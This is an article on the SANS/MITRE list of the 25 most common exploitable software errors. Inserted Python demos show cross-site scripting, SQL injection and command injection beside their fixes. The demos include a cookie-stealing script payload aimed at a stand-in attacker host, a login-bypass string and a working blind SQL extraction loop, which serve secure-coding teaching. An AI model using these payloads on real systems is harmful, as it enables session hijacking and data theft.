Software experts highlight the 25 most common bugs exploited by hackers.
A small set of software programming errors is responsible for virtually every major type of cyber attack, from the recent intrusions at Google to the disruptions and network-security breaches at private utilities and government agencies. This is according to a report published by two non-profit technology research organizations.
The SANS (SysAdmin, Audit, Network, Security) Institute and MITRE are the two sources of the report, which identifies 25 frequent coding errors that put mission-critical systems at risk by enabling security bugs, cyber espionage and cyber crime. Security analysts from a variety of organizations, including the National Security Agency and the US Department of Homeland Security's National Cyber Security Division, contributed to the list.
The most common programming errors leading to security breaches are cross-site scripting (XSS) flaws, SQL injection errors, and buffer overflow vulnerabilities.
SQL injection and cross-site scripting sit at the top of the 2010 list. The researchers point out that even when a software package is not itself a web application, it may still have a web-based management interface or produce HTML-formatted output, and either of those can expose it to cross-site scripting. For data-rich software applications, SQL injection is the attacker's means of stealing the keys to the kingdom.
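The cross-site scripting point above, as an added example (not code from the report or from the article): a status page in an HTML-based output format that reflects an attacker-controlled display name, first unescaped and then escaped at the point of output. The page template, the parameter and the payload are constructed for the demo.

```python
"""Cross-site scripting (CWE-79) in an HTML-based output format, and the fix.

Added example, not code from the report or the article. The status page
template and the attacker payload below are constructed."""
import html

# Constructed attacker input, e.g. a display name taken from a request parameter.
PAYLOAD = '<script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>'


def render_status_unsafe(display_name: str) -> str:
    # Vulnerable: the untrusted value is concatenated straight into the HTML,
    # once in text context and once inside a quoted attribute.
    return (f"<html><body><h1>Status for {display_name}</h1>"
            f'<span title="{display_name}">online</span></body></html>')


def render_status(display_name: str) -> str:
    # Fixed: escape for the HTML context at the point of output. quote=True
    # also turns quotes into entities so the value cannot break out of a
    # quoted attribute value.
    safe = html.escape(display_name, quote=True)
    return (f"<html><body><h1>Status for {safe}</h1>"
            f'<span title="{safe}">online</span></body></html>')


def has_injected_script(page: str) -> bool:
    # Crude check used only to show the difference between the two renderers:
    # a live <script> tag survives in the unsafe page, an entity-encoded one
    # in the fixed page is inert.
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_status_unsafe(PAYLOAD))
    print(render_status(PAYLOAD))
```

Escaping is context-specific: `html.escape` is the right encoder for HTML text and quoted attribute values, but a value placed into a URL or into inline JavaScript needs the encoder for that context instead.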
The other top vulnerabilities identified by the study were weak access control, cross-site request forgery (CSRF) flaws, overly permissive default settings, missing authentication, and missing encryption of sensitive data.
The researchers divided the Top 25 risky software errors into three high-level categories: porous defenses, risky resource management, and insecure interaction between components.
"Porous defenses" are weaknesses in defensive techniques that are often misused, abused, or simply ignored. "Risky resource management" errors occur when software does not properly manage the creation, transfer, use, or destruction of important system resources.
"Insecure interaction between components" covers the insecure ways in which data is sent and received between separate components, processes, programs, modules, threads, or systems.
These days, the researchers say, it seems as if software is all about the data: it is put into the database, pulled back out, massaged into information, and sent elsewhere for fun and profit. If attackers can influence the SQL that you use to communicate with your database, then suddenly all your fun and profit belongs to them. If you use SQL queries in security controls such as authentication, attackers can alter the logic of those queries to bypass security. They can modify the queries to steal, corrupt, or otherwise change your underlying data. They will even steal data one byte at a time if they have to, and they have the patience and know-how to do so.
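The three attacks the paragraph above describes (bypassing an authentication query, altering its logic, and pulling data out one character at a time) carried through on a small SQLite database, as an added example that is not code from the report or the article. The tables, rows and the plaintext password are constructed for the demo; the blind-extraction loop uses the vulnerable login as a yes/no oracle and is written generally enough to recover any alphanumeric secret the query can reach.

```python
"""SQL injection (CWE-89): login bypass, blind extraction, and the fix.

Added example, not code from the report or the article. Table and column
names and the sample rows are constructed (a real system would store a
password hash, not the password)."""
import sqlite3
import string


def build_db() -> sqlite3.Connection:
    # Constructed sample data: one admin user and one application secret.
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);"
        "INSERT INTO users(username, password) VALUES ('admin', 'CorrectHorse42');"
        "CREATE TABLE secrets(name TEXT, value TEXT);"
        "INSERT INTO secrets VALUES ('api_key', 's3cr3tK3y');"
    )
    return con


def login_unsafe(con: sqlite3.Connection, username: str, password: str) -> bool:
    # Vulnerable: attacker-controlled strings are spliced into the SQL text,
    # so a quote in the username changes the query's logic.
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return con.execute(sql).fetchone() is not None


def login_safe(con: sqlite3.Connection, username: str, password: str) -> bool:
    # Fixed: bound parameters are passed to the engine as data and can never
    # become part of the query's grammar.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None


ALPHABET = string.ascii_letters + string.digits


def extract_secret_blind(con: sqlite3.Connection, oracle, max_len: int = 64) -> str:
    # Boolean-based blind extraction: each login attempt answers one
    # question ("is character N of the secret equal to c?"), so the secret
    # leaks one character at a time. The trailing '--' comments out the
    # original password check.
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            probe = (f"admin' AND (SELECT substr(value,{pos},1) FROM secrets "
                     f"WHERE name='api_key') = '{ch}' --")
            if oracle(con, probe, "irrelevant"):
                recovered += ch
                break
        else:
            break  # no candidate matched: end of the secret
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("bypass via unsafe login:", login_unsafe(db, "admin' --", "wrong"))
    print("bypass via safe login:  ", login_safe(db, "admin' --", "wrong"))
    print("secret via unsafe login:", repr(extract_secret_blind(db, login_unsafe)))
    print("secret via safe login:  ", repr(extract_secret_blind(db, login_safe)))
```

With the parameterized query the same probe strings are compared literally against the `username` column, so the bypass fails and the extraction loop returns an empty string on its first position.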
Software is often the bridge between an outsider on the network and the internals of the operating system. The researchers say that when you invoke another program on the operating system, but allow untrusted inputs to be fed into the command string you generate to execute that program, you are inviting attackers to cross that bridge by executing their own commands instead of yours.
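The command-string problem above, as an added example (not code from the report or the article): a "host lookup" feature that hands user input to an external program, once by building a shell command line and once by passing an argument vector with no shell involved. To keep the demo offline and portable, the external program is a tiny Python one-liner standing in for a tool such as ping or nslookup; that helper and the allow-list pattern are assumptions.

```python
"""OS command injection (CWE-78): shell string versus argument vector.

Added example, not code from the report or the article. The helper below
stands in for a real external tool so the demo runs offline; its output
format and the hostname allow-list are assumptions."""
import re
import shlex
import subprocess
import sys

# Stand-in for the external tool: it just reports the host it was given.
HELPER = "import sys; print('lookup:', sys.argv[1])"

# Allow-list for defence in depth: RFC 1123-style hostname labels only.
HOSTNAME_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")


def lookup_unsafe(host: str) -> str:
    # Vulnerable: untrusted input is spliced into a command line that a shell
    # parses, so ';', '|', '$(...)' and friends in `host` become shell syntax.
    cmd = f'{shlex.quote(sys.executable)} -c "{HELPER}" {host}'
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_safe(host: str) -> str:
    # Fixed: no shell at all. The input travels as exactly one argv element,
    # whatever characters it contains.
    argv = [sys.executable, "-c", HELPER, host]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def is_valid_hostname(host: str) -> bool:
    # Second layer: reject anything that is not shaped like a hostname before
    # it gets anywhere near a command.
    return len(host) <= 253 and HOSTNAME_RE.match(host) is not None


def lookup_validated(host: str) -> str:
    if not is_valid_hostname(host):
        raise ValueError(f"refusing to look up {host!r}")
    return lookup_safe(host)


if __name__ == "__main__":
    injected = "127.0.0.1; echo INJECTED"
    print("unsafe:", repr(lookup_unsafe(injected)))  # second line is the attacker's command
    print("safe:  ", repr(lookup_safe(injected)))    # whole string is one argument
```

The argument-vector form is the fix; the allow-list is not a substitute for it but a cheap extra check that also catches input the helper would mishandle for other reasons.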
To eliminate these prominent programming errors, users and experts alike need to unite against the agenda of cyber criminals and the persistent threat posed by competing nation states. What a life we would have if the internet were hacker-free.